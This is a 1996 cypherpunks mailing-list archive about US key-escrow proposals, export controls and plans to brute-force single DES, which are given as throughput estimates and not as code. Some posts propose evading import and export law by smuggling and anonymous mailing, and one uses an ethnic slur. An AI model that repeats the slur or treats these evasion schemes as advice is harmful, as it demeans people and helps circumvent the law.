> but between the up-front cost and the difficulty of design and production,
> it's less likely to get done.  (Still if someone wants to buy me a nice
> FPGA board, I'll see what I can do).

I understand that *two* independent efforts cracking single DES using FPGAs 
are currently being set up. If the parties whish to come forward, my offer 
to donate to this cause still stands.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Wed, 2 Oct 1996 09:03:45 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: Clipper IV Proposal
Message-ID: <n1367933608.84394@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


FYI,

The Clipper IV Proposal is now up at the EPIC Web site at:

 http://www.epic.org/crypto/key_escrow/clipper4_statement.html

Dave


_________________________________________________________________________
Subject: Clipper IV Proposal
_________________________________________________________________________
David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301  *  HTTP://www.epic.org
Washington, DC 20003                *  ftp/gopher/wais cpsr.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 2 Oct 1996 09:20:28 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
In-Reply-To: <199610011706.NAA14852@attrh1.attrh.att.com>
Message-ID: <v03007813ae77351a2b54@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:53 pm -0400 10/1/96, Lucky Green wrote:
> Note that the second article stated that the administration will allow
> the use of stronger cypto than 56 bit once GAK is in place. If this is
> true, much of the current industry resistance is likely to evaporate.
> Even the promise might suffice.

My brother has gone out and had all these nice bumperstickers made up. They
say,

       Wake up, America!
He won't love you in the morning.

I had trouble figuring out what my elder sib was getting at, until this...

;-),

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Wed, 2 Oct 1996 09:21:00 +0800
To: cypherpunks@toad.com
Subject: Hey, there's a camera in that palm tree!
Message-ID: <199610012100.RAA14445@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



	LANGHORNE, Penn., Sept 30 (Reuter) - Digital Descriptor
	Systems Inc said on Monday that it had received the first
	$140,000 phase of a proposed $1.4 million contract from IBM.
	    The money is to be used by the Bahamas for the installation
	of imaging identification systems. The first segment of the
	imaging program will be installed in the Bahamas by the end of
	this year.
	    Digital Descriptor, in a three-year partnership with IBM to
	create a program needed on a country-wide basis by the
	government of the Bahamas, manufactures and markets imaging
	systems for municipal and private criminal enforcement markets.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Coleman <coleman@math.gatech.edu>
Date: Wed, 2 Oct 1996 09:38:23 +0800
To: cypherpunks@toad.com
Subject: Re: How might new GAK be enforced?
In-Reply-To: <v0300780dae77032b2bdd@[207.167.93.63]>
Message-ID: <199610012106.RAA11318@redwood.skiles.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


> (Else what's to stop Giant Corporation from using Non-GAKked software
> within the U.S., which is perfectly legal (under the "voluntary" system),
> but then "happening" to have their foreign branches and customers obtain
> "bootleg" versions at their end? All it takes is a single copy to get out,
> and be duplicated a zillion times. Voila, interoperability, with the only
> "crime" being the first export...which is essentially impossible to stop,
> for so many reasons we mention so often. Conclusion: Government must make
> this very mode illegal, perhaps by making it a conspiracy to thwart the
> export laws....)

I've always wondered why large companies just don't write some type of
standards document for crypto to interoperate, and then have each
foreign branch write (or contract out) their own version.  I don't see how
this violates export laws in any way.

Surely this has to be easier than some of the contortions large companies
are going through now to safeguard communications between branchs in
different countries.

Richard Coleman
coleman@math.gatech.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 2 Oct 1996 11:57:46 +0800
To: perry@piermont.com
Subject: Re: Export laws don't just affect crypto
Message-ID: <199610020019.RAA02792@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:32 PM 10/1/96 -0400, Perry E. Metzger wrote:
>
>Lucky Green writes:
>> > Umm, so are you violating ITAR if you *use* these GPS-guided missiles
>> 
>> No you aren't. A little known provision in the ITAR excempts exports 
>> by missile. Seriously.
>
>Well, not quite -- it exempts exports by space launch, but I think
>thats intended for things like satelite launchings and not for things
>like missile attacks against other countries...


If ITAR exempts exports by missile, does that mean that we merely have to 
make a model rocket, put a floppy containing PGP in the payload compartment, 
and shoot the thing over the wall into Mexico, or into Canada?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Wed, 2 Oct 1996 09:52:37 +0800
To: cypherpunks@toad.com
Subject: The Impact of Cybercommunications on Traditional Financial Services
Message-ID: <2.2.32.19961001212421.009df4b8@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


http://www.ctr.columbia.edu/citi/cybercom.html
http://www.ctr.columbia.edu/citi/cybcompap/ravi.htm

Abstract: 



This paper presents a framework that provides a conceptual understanding of
electronic commerce-based financial services. The paper then discusses some
of the research issues that need to be addressed in this emerging area.
Systematic research o n online financial services is virtually non-existent.
Most of the early work consists of anecdotal evidence from individual
companies, usually in the form of trade journal articles which have no
empirical basis. Clearly there is a need for industry-acade mia
collaboration to understand the online financial services area better. There
is also a need to develop methods and tools for measuring the effectiveness
of these services. Traditional effectiveness measuring methods will be of
limited use in cyberspac e as banks enter an era in which financial products
are treated as information commodities and banks are in competition with
non-banks to serve customers with the best bundle of information
_______________________
Regards,          An oral contract isn't worth the paper it's written on. -?
Joseph  Reagle    http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu    E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 2 Oct 1996 10:29:50 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Signs of Trouble in D.C.
In-Reply-To: <Pine.SUN.3.94.961001002354.20271A-100000@polaris>
Message-ID: <Pine.SUN.3.91.961001172945.5991B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996, Black Unicorn wrote:

> WARNING
> THIS AREA HAS BEEN
> DECLARED A DRUG FREE ZONE

So, by virtue of declaring "this" area as a Drug Free zone, are they 
declaring other areas drug-unfree zones?  Does this legitimize the use of 
drugs in other zones? (could be an interesting flow of logic, only it's 
doubtfult it would hold "But yer honor, there was no sticker saying it 
was a drug free zone, so that means it's okay to do drugz" :)
 
> Any person congregating in a group of 2 or more persons on 
> public space within the boundaries of this drug free zone for 
> the purpose of participating in the use, purchase of sale of 
> illegal drugs, and who fails to disperse after being 
> instructed to disperse by a uniformed member of the 
> Metropolitan Police Department, is subject to arrest.  An 
> arrest can result in a fine of not more than $300, 
> Imprisonment for not more than 180 days or both.

So what happens if you're just hanging out and aren't doing drugs, say 
two guys wait for their friend or something, and have no drugs on them 
but don't disperse?

Can there a lawsuit be there against the officers who would arrest them 
for wrongful arrest?  (probably not)

This is of course vewy vewy silly.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 2 Oct 1996 16:35:28 +0800
To: roger@coelacanth.com (Roger Williams)
Subject: Re: Encrypted lists and ease of use
In-Reply-To: <rogerg23zb1op.fsf@sturgeon.coelacanth.com>
Message-ID: <199610012300.SAA00281@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


I wrote a perl script for such encrypted list.

It works the following way: suppose the list address is
somelist@someplace.com. The list owner generates a pgp key
with user name equal to "somelist@someplace.com". The public key gets
sent to all list participants.

The members, in turn, submit their public keys to the maintainer.
He lists their email addresses in the "subscribers" file. 

The perl script gets invoked from procmail. It decodes the incoming
message.  If an incoming message is not encrypted or cannot be decrypted,
the list processor returns it to the sender (this quickly teaches people 
to do encrypt their messages).

The script then encodes the message for each participant and sends it to
the recipients. 

What you need to run it: 

	- Perl 5
	- Perl 5 PGP module (it is quite crappy because it does not
          allow passphrases containing several words)
	- PGP
	- premail

have fun

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omegaman@bigeasy.com>
Date: Wed, 2 Oct 1996 11:31:45 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: How might new GAK be enforced?
In-Reply-To: <v0300780dae77032b2bdd@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.961001180102.213A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996, Timothy C. May wrote:
> 
> (Else what's to stop Giant Corporation from using Non-GAKked software
> within the U.S., which is perfectly legal (under the "voluntary" system),
> but then "happening" to have their foreign branches and customers obtain
> "bootleg" versions at their end? All it takes is a single copy to get out,
> and be duplicated a zillion times. Voila, interoperability, with the only
> "crime" being the first export...which is essentially impossible to stop,
> for so many reasons we mention so often. Conclusion: Government must make
> this very mode illegal, perhaps by making it a conspiracy to thwart the
> export laws....)

This is surely one of the next steps
 
> 
> Any other ideas on how the government plans to enforce GAK, to make GAK the
> overwhelmingly-preferred solution?
> 

Well, clearly the goal is to "de-legitimize" non-GAK crypto for business
use.  In the Nytimes article (--sorry about the lack of URL) an official
mentions that banks and other large institutions will use "legitimate" types
of crypto while students and clever terrorists will continue to use other
types of crypto.

Notice that the issue of digital signatures and authentication has never
been adressed by government crypto policy.  A next step for the government's
cause is to begin recognizing digital signatures with the force of law
provided the signatures are made with "legitimate" (GAKked) crypto.

Signatures created with non-GAKked crypto will not be recognized by the law.
Contracts and agreements signed with non-GAKked crypto will not be
enforceable by the courts.

That is one sure way to "de-legitimize" "rogue" cryptography.

And undoubtedly IBM and other corporations who participate in the
"key-recovery" program will spend tons of money promoting there scheme.
And I suspect our tax dollars will also suppport the publicity campaign as
well as the creation of this system.

me

_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com>
 PGP Key fingerprint =  6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63
 Send e-mail with "get key" in the "Subject:" field
 to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 2 Oct 1996 10:57:39 +0800
To: trei@process.com
Subject: Re: Can we kill single DES?
In-Reply-To: <199610012026.NAA28151@toad.com>
Message-ID: <199610012215.SAA03702@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter Trei" writes:
> Since it looks like the US government will be allowing the export of 
> 56 bit espionage-enabled software, it's time to kill single DES.

Double plus agreed.

> On this type of processor, it would still take 9133 years to exhaust 
> a 56 bit key space. On the other hand, on 20,000 processors of this
> power it would take less than 6 months. If the target is encrypted
> in a chaining mode with an unknown 8 byte IV, the time more than 
> doubles. 
> 
> Clearly, this goes far beyond the number of cpus available to the 
> members of this list (though well within the power of most governments
> and  many corporations)
> 
> The best idea I've heard for recruiting this many cpu cycles is to create
> a screen saver which does DES-cracking while machines are idle.
> Another incentive is to offer a cash prize to the person(s) who find the
> key.

These are both possibilities.

> 1. Is this a good idea? What will happen if DES becomes perceived
>     as insecure?

Well, I believe that we are better off if the general perception
catches up with reality.

> 2. What is the probability of success required to make it worth doing?

We need 50% success in one month to make it reasonably worthwhile.

> 3. What would be the consequences of failure?

I don't think we will fail :)

> 4. What other platforms than NT/Win95/Pentium should be considered?
>    I could write a Unix demon version, but unless it's tailored for the 
>    cpu, a lot of efficency is lost
>    (The aggregate number of idle cycles available for testing is the 
>   crucial number).

Other CPUs: MC68k, PowerPC, SPARC and Alpha versions, in roughly that
order.

> 5. What's a good target?

Good question :)

> Assume that the program will be a Win95/NT screen saver or 
> Unix deamon.

An X screen saver would also be good. Lots of
Linux/FreeBSD/NetBSD/BSDI weenies in the world.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 2 Oct 1996 12:58:32 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Clipper III on the table
In-Reply-To: <v03007801ae7760b5f2f3@[206.119.69.46]>
Message-ID: <Pine.3.89.9610011854.A23882-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 1 Oct 1996, Robert Hettinga wrote:
[as to why HP and others support GAK in exchange for DES export]

> I agree with Lucky's earlier hypothesis that HP's doing this to curry 
favor
> for government contracts in lieu of an actual marketing strategy, and I
> leave TIS's motives up to the list as an exercise. ;-).

This not a hypothesis. A policy person from HP told me that

1. HP as well as TIS and other companies sell single DES products that 
they would like to be able to export.
2. He was directed by HP's marketing department to find a way to make 
that happen.
3. He therefore supports a GAK for export "compromise".

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 2 Oct 1996 13:54:30 +0800
To: cypherpunks@toad.com
Subject: Re: Can we kill single DES?
Message-ID: <199610020201.TAA10143@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:27 PM 10/1/96 -6, Peter Trei wrote:
>Unlike many cypherpunks, I actually write code (:-). I took Phil
>Karn's DES386 as a starting point, and modified it to run effiiciently
>on the Pentium. The code I've written will run 14 round DES (all
>that is required for a key test app) at 254,000 crypts/sec on a
>90 MHz Pentium.  
>
>Allow about 10% overhead for key scheduling (there are some tricks to
>speed this up), and we're still at about 250,000 keys/sec on a 100MHz
>Pentium (I'm using a nominal 100 MHz Pentium as my 'unit' of
>cpu power).  
[snip]
>On this type of processor, it would still take 9133 years to exhaust 
>a 56 bit key space. On the other hand, on 20,000 processors of this
>power it would take less than 6 months. If the target is encrypted
>in a chaining mode with an unknown 8 byte IV, the time more than 
>doubles. 
[snip]
>Questions for general discussion:
>
>1. Is this a good idea? What will happen if DES becomes perceived
>    as insecure?

Reluctantly, I'd have to say that I don't think this is a good idea.  If 
anything, what this would inadvertently demonstrate is how difficult (at 
least, with non-dedicated hardware) it is to crack DES. The resulting number 
will be misleading if it doesn't represent the real danger to encryption 
users.  I contend that a misleading estimate is actually worse than none at 
all, because it is a number which can be misused.  They can say, "Hey, these 
guys had to apply $10-20 million dollars worth of computer equipment for a 
full year just to get the contents of a SINGLE MESSAGE!"  

The real danger is, indeed, a dedicated system, because it would presumably 
be the way a "real opponent" would do it.  First, my assumptions: I assume 
that it would be generally straighforward to build a cracking chip that 
tries 10 million keys per second, with a great deal of internal parallelism 
and pipelining.  This is a factor of 40 higher than the number you quoted 
above for a 100 MHz Pentium.  Further, I assume that at least 10 of these 
chips could be installed on a single card in a PC, monitored by a program 
running on that PC.  Thus, it would take 9133 years/400, or 23 years, for a 
single one of these modules to try all keys.  With "only" 100 of these 
units, a crack would take about 3 months max, 1.5 months on the average.

Now, THAT sounds like a real threat!  It would be a far more effective 
demonstration of the weakness of DES. Compared to this, the alternative, say 
an average of a crack in a year with 4500 machines, is practically 
meaningless.   An even more ominous configuration would involve perhaps 50 
chips per full-length board, seven boards installed in a stripped-down  PC, 
which would produce a crack in 4 months average with one system alone.


So how would all this be done?  First, write a serious proposal for the 
project and circulate it among companies with fab capacity.   How about 
finding a custom, semi-custom, or other semiconductor manufacturer who would 
be willing to do the fab in exchange for the publicity, or a deep discount. 
It might be particularly "relevant" if that company had an interest in 
seeing DES discredited, possibly because it was going to be building an 
encryption chip with greater security. (NTT?  and their new encryption 
chip?)  Likewise, find a politically-sympathetic designer with access to IC 
layout software, etc.  The way I see it, there has to be a huge amount of 
unused 0.5-0.7 micron IC capacity around the world.  Remember, we're only 
talking about a few hundred wafers.

And for example, as I recall, I've seen a number of ads over the years for a 
company called "Orbit Semiconductor,"  which builds small-volume  IC's by 
putting a number of different designs on a single wafer.  The number of die 
per wafer is, more or less, based on the volume needed for that particular 
chip.  They do a new fab run fairly regularly, to accomodate designs with 
fast turnaround.  Presumably, they occasionally would like to do a run 
quickly without waiting for the wafer to "fill up" with new designs.  

Anyway, the way I see it, you're probably going to burn up over a million 
dollars worth of ELECTRICITY alone on a single crack with Pentiums.  Why not 
get whoever is doing these cracks to donate 1/10th of this value to finance 
the portion of this project which cannot be "finagled"?

Maybe Microsoft would be willing to help?  After all, it is THEY who are 
going to be limited to DES-strength exports if things continue as they've 
been going.  How about Intel?



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 2 Oct 1996 13:43:35 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
In-Reply-To: <32518E96.7DE1@netscape.com>
Message-ID: <v03007800ae7791a88634@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:11 PM -0700 10/1/96, Lucky Green wrote:
>On Tue, 1 Oct 1996, Tom Weinstein wrote:
>
>> Lucky Green wrote:
>> >
>> > Note that the second article stated that the administration will allow
>> > the use of stronger cypto than 56 bit once GAK is in place. If this is
>> > true, much of the current industry resistance is likely to evaporate.
>> > Even the promise might suffice.
>>
>> Don't bet on it.
>
>Allow me to say here that I do not belive that Netscape will be amongst
>those fooled so easily. But IBM, HP, TIS, and others have already been
>fooled. The USG does not need to get every software company to agree with
>their proposal. Divide and conquer. Seems that the USG has done a
>marvelous job of D&C so far.

I also believe Netscape has cast its lot on the side of strong crypto, and
will likely reject the GAK-IBM-Clipper IV-TIS monstrosity.

And if Netscape doesn't, there's always Microsoft Explorer waiting!

(Seriously, if either Netscape or Microsoft, the two 800-MB gorillas,
chooses to implement GAK, a concerted campaign to urge people to switch to
the _other_ one can be launched. "Just Say No to Netscape" or "Just Say No
to MS Explorer," as applicable. Then the other one, the one not yet
implementing GAK, can get the message. If, of course, they coordinate their
adoption of GAK for a simultaneous release, then we're screwed. :-})

As for IBM's involvement, they've played around with the NSA for decades.
Nothing new there. Fortunately, today they're just a marginal player.

--Tim May


--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 2 Oct 1996 12:02:04 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III on the table
In-Reply-To: <32518E96.7DE1@netscape.com>
Message-ID: <v03007801ae7760b5f2f3@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:11 pm -0400 10/1/96, Lucky Green wrote:
> Allow me to say here that I do not belive that Netscape will be amongst
> those fooled so easily. But IBM, HP, TIS, and others have already been
> fooled.

Actually, I think those companies have been coerced. Microsoft will be next.

Remember that IBM and Microsoft have a very clear understanding of what
government coercion is, both at the hands of the DOJ's anti-trust section.

I agree with Lucky's earlier hypothesis that HP's doing this to curry favor
for government contracts in lieu of an actual marketing strategy, and I
leave TIS's motives up to the list as an exercise. ;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 2 Oct 1996 14:16:36 +0800
To: "Perry E. Metzger" <cypherpunks@toad.com
Subject: Re: Clipper III on the table
In-Reply-To: <199610011844.OAA02818@jekyll.piermont.com>
Message-ID: <199610020242.UAA11103@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199610011844.OAA02818@jekyll.piermont.com>, on 10/01/96 
   at 02:44 PM, "Perry E. Metzger" <perry@piermont.com> said:

=1Estewarts@ix.netcom.com writes:
=1E> Hip Hip Hooray!  Clinton will finally let us use _some_
=1E> 20+year-old encryption code, which has been known to be relatively 
=

=1E> weak for 15 years, as long as we give them all our keys!  What a guy=
!

=1EI personally don't mind forcing escrow of 56 bit keys so long as
=1Epeople can use 128 bit keys without escrow. >:-)

        c'mon, perry, might as well push it on up to 2048. <g & RTFM>

        besides, their "hiding their heads in the sand" game is getting
    hysterical; it's approaching a bad Monty Python gig for silliness.

=1E> I assume he's partly doing this to make a big "See, I'm in favor 
=1E> of high-tech trade and crime-fighting" push in time for the election=
, 
=1E> and unlike RC4/40, cracking DES on general-purpose processors 
=1E> _is_ a big enough job that probably can't do a distributed crack 
=1E> in two weeks.

=1EWe really have to work on cracking DES at least once -- it would
=1Esubstantially reduce the wind in the Administration's sails.
=1EPerry

        while you have the setup, try at least three messages so the
    whiners have not claim to "...it was a lucky hit...!"

        what did the 128 key 1976 Scientific American challenge
    take in resources a few years back? it was 386s?

        meanwhile, go after the new one they are using for the govern-
    ment.  you are absolutely correct that the wind will be calm in
    their sails if it is nailed enough times --if we can get the mainstre=
am
    to publish it, and all of us not rounded up for dope, or one of the
    other easy to drop evidence attacks, to get us off the street.... 

       given the smell of the Inslaw / 'Promis' deal with its back doors =

    big enough to drive a truck in and imbedded sniffers, I'm sure DES 
    has a few...  NSA is not about to pass that up, and they wrote it.


--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 2 Oct 1996 14:40:47 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <199610020332.UAA16659@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:57 PM 10/1/96 -0700, Declan McCullagh wrote:
>
>
>---------- Forwarded message ----------
>Date: Tue, 1 Oct 1996 14:56:21 -0700 (PDT)
>From: Declan McCullagh <declan@well.com>
>To: fight-censorship@vorlon.mit.edu
>Subject: White House crypto proposal -- too little, too late
[snip]
>What's even more disturbing is what the administration might do
>next. After the roundtable broke up, I chatted with Michael Vadis, one
>of the assistant deputy attorneys general who oversees national
>security issues. He said an international consensus is forming that
>terrorists can use crypto; therefore crypto must be controlled. The
>U.S. is certainly pushing this line at the OECD talks.
>
>"But it just takes one country to decide to export strong crypto," I said.
>"You're missing something," said Vadis.
>"What?" I asked. "Unless you're talking about import restrictions."
>"Exactly," he said.
>-Declan


An import restriction would be even less effective than the current export 
restrictions.  With an import restriction, a person need merely receive a 
given piece of software in the mail from an "unknown" benefactor, software 
that (surprise!) would have been illegal to import.  (the software doesn't 
even have to be mailed from outside the US, merely trucked in by a wetback 
and anonymously mailed by tossing it into the ubiquitous USnail PO Box.)   
Redistribution of this software would have to be legal, if for no other 
reason than nobody could prove it was imported illegally.  Nobody outside 
the US would have any standing to sue for copyright violation, because they 
couldn't import it and sell it without restrictions.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 2 Oct 1996 15:10:28 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: How might new GAK be enforced?
Message-ID: <199610020332.UAA16663@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 AM 10/1/96 -0800, Timothy C. May wrote:
>
>Now that the shoe is dropping on "Clipper III" (or "Clipper IV"), the
>"voluntary, for export, key escrow system," how might it be enforced?
>
>Some possibilities:
[snip]

>(Else what's to stop Giant Corporation from using Non-GAKked software
>within the U.S., which is perfectly legal (under the "voluntary" system),
>but then "happening" to have their foreign branches and customers obtain
>"bootleg" versions at their end? All it takes is a single copy to get out,
>and be duplicated a zillion times. Voila, interoperability, with the only
>"crime" being the first export...which is essentially impossible to stop,
>for so many reasons we mention so often. Conclusion: Government must make
>this very mode illegal, perhaps by making it a conspiracy to thwart the
>export laws....)

If this solution were really practical, it would have been tried already.  
One of the biggest problems with enforcing anti-export laws is that there is 
no guarantee that anybody currently within the jurisdiction of the country 
involved (for concreteness, the US) is actually responsible for a given 
export.  Let alone KNOWN to be responsible.  And it's even less likely that 
it be "provable" within the standards of court cases.  Worse, doing the 
prosecution does nothing about returning the copies of the program to the 
country of origin, making the whole exercise pretty damn futile!


>Any other ideas on how the government plans to enforce GAK, to make GAK the
>overwhelmingly-preferred solution?

Clipper I was, I think, their best hope for promoting GAK.  It would have 
engineered distorted-market pressure by making it artificially easy to use 
GAK, hard to use non-GAK. Subsequent proposals have all been weaker, less 
effective, less practical, and less encompassing. 

And the "worst" part, from the point of view of the USG, is that it's now 
3.5 years after the announcement of Clipper I, and they're no closer to 
foisting this turkey onto us.  Nobody in Congress is under the illusion that 
the public likes this stuff, unlike 1993 where they could at least imagine 
that there were no emotions running high on the subject.  In 1993, they were 
under the impression that they could implement their fondest desires with 
legislation; now the only likely legislation is either anti-GAK or non-GAK.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Wed, 2 Oct 1996 14:32:00 +0800
To: cypherpunks@toad.com
Subject: Re: Weaknesses in Smart Cards? (Re: FLA_wed)
Message-ID: <ae778e7901021004910d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:21 AM 9/26/96, Timothy C. May wrote:
...
>Strip-back of the outer packaging is possible, of course. I'd need to know
>a lot more about the packaging used by VISA and other smartcard makers to
>know how economical this would be. (Breaking any single card is not
>necessarily a financial windfall, if the card has a limit, for example.
>This puts a limit on how much $$$ can be spent on cracking a chip.)

As best I can figure, extracting the secret from a Mondex card gives you not
merely the money from the card, but the "digital plates" with which to mint
arbitrarily much more money. I only say this because the only protocol the
I can think of that fits what we do know of Mondex has this problem. This fault
does not plague Chaum cash.

I don't know how to code the card application so that a transient errors
won't just occasionally cause the secret to be exported. Then again that
may be possible to code it for "fail safe". If it were my money backing
the Mondex cards, I would want to know how it worked.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 2 Oct 1996 15:06:12 +0800
To: cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <Pine.GSO.3.95.961001145707.23810F-100000@well.com>
Message-ID: <199610020350.UAA08078@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Tue, 1 Oct 1996 14:56:21 -0700 (PDT)
> From: Declan McCullagh <declan@well.com>
> 
> "What?" I asked. "Unless you're talking about import restrictions."
> 
> "Exactly," he said.
> 
> -Declan

I don't doubt that they can do this if they really want to, but I
wonder what legal basis they will use for import restrictions.

Are there any current import restrictions for products on can legally
manufacture, sell, and use in the United States?

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 2 Oct 1996 14:58:01 +0800
To: "Marc J. Wohler" <mwohler@ix.netcom.com>
Subject: Re: active practice in America [RANT]
In-Reply-To: <199610011619.JAA24481@dfw-ix10.ix.netcom.com>
Message-ID: <3251E6B3.398C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Marc J. Wohler wrote:
> At 11:19 PM 9/30/96 -0700, you wrote:
> >I'm glad you asked.  I wouldn't pretend to have *the* answer, but rather
> >than screw around with basic Constitutional enumerations, I think the
> >"authorities" should have had the guts to challenge those cases (at
> >least the most obvious ones at first, to get the ball rolling), by
> >investigating and declaring mistrials based on some kind of jury
> >manipulation which showed bad faith on the part of the locals.

> Theory sounds great, but what if, as often was the case, the
> "authorities" were the major part of the problem.

I presume heirarchical authority.  That's what we had in the U.S., even 
in the 1960's.  The specific authorities running bogus juries were 
generally county-level.  One could argue that the states, and by 
extension the feds, looked the other way as long as they could, and 
indeed they did.

Once they could no longer look the other way, those higher-level 
authorities should have proceeded against the local governments as I 
specified, rather than undermining the Constitutional enumerations.

If there should happen to be a good argument that the feds and states 
couldn't proceed against the locals because these higher-level 
authorities were somehow compromised (other than general scumbagness), 
I'd like to know how.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 2 Oct 1996 14:39:38 +0800
To: cypherpunks@toad.com
Subject: Re: How might new GAK be enforced?
In-Reply-To: <199610020332.UAA16663@mail.pacifier.com>
Message-ID: <v03007801ae77a4d9088d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:32 PM -0800 10/1/96, jim bell wrote:
>At 09:39 AM 10/1/96 -0800, Timothy C. May wrote:

